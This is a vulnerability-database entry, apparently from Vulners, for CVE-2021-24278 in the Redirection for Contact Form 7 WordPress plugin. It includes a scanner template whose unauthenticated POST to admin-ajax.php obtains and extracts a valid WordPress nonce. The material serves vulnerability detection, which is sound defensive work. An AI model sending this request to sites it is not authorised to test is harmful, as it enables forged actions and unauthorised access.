| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| WordPress plugin 安全漏洞 | 14 May 202100:00 | – | cnnvd | |
| WordPress Redirection for Contact Form 7 Plugin Improper Access Control Vulnerability (CNVD-2021-36045) | 17 May 202100:00 | – | cnvd | |
| CVE-2021-24278 | 14 May 202111:38 | – | cve | |
| CVE-2021-24278 Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation | 14 May 202111:38 | – | cvelist | |
| CVE-2021-24278 | 14 May 202112:15 | – | nvd | |
| WordPress Redirection for Contact Form 7 Plugin < 2.3.4 Multiple Vulnerabilities | 4 Jun 202100:00 | – | openvas | |
| CVE-2021-24278 | 14 May 202112:15 | – | osv | |
| Design/Logic Flaw | 14 May 202112:15 | – | prion | |
| CVE-2021-24278 | 22 May 202518:23 | – | redhatcve | |
| VulnCheck KEV: CVE-2021-24278 | 29 Jan 202300:00 | – | vulncheck_kev |
id: CVE-2021-24278
info:
name: WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation
author: 2rs3c
severity: high
description: WordPress Contact Form 7 before version 2.3.4 allows unauthenticated users to use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.
impact: |
Attackers can exploit this vulnerability to perform actions on behalf of authenticated users, leading to potential data breaches or unauthorized access.
remediation: |
Update WordPress Contact Form 7 plugin to version 2.3.4 or later to fix the Arbitrary Nonce Generation vulnerability.
reference:
- https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413
- https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24278
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-24278
cwe-id: CWE-863
epss-score: 0.07359
epss-percentile: 0.93662
cpe: cpe:2.3:a:querysol:redirection_for_contact_form_7:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: querysol
product: redirection_for_contact_form_7
framework: wordpress
tags: cve2021,cve,wordpress,wp-plugin,wpscan,querysol,vkev,vuln
http:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php"
body: "action=wpcf7r_get_nonce¶m=wp_rest"
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '"success":true'
- '"nonce":"[a-f0-9]+"'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
regex:
- '"nonce":"[a-f0-9]+"'
part: body
# digest: 490a004630440220118bca05005647325203558b208dd223c7310885e1d8d89c43abbf299eca118602207612756cde3086cba6a883066d7ea58787e5c4038ecd982fcc6541741b7bd2d7:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation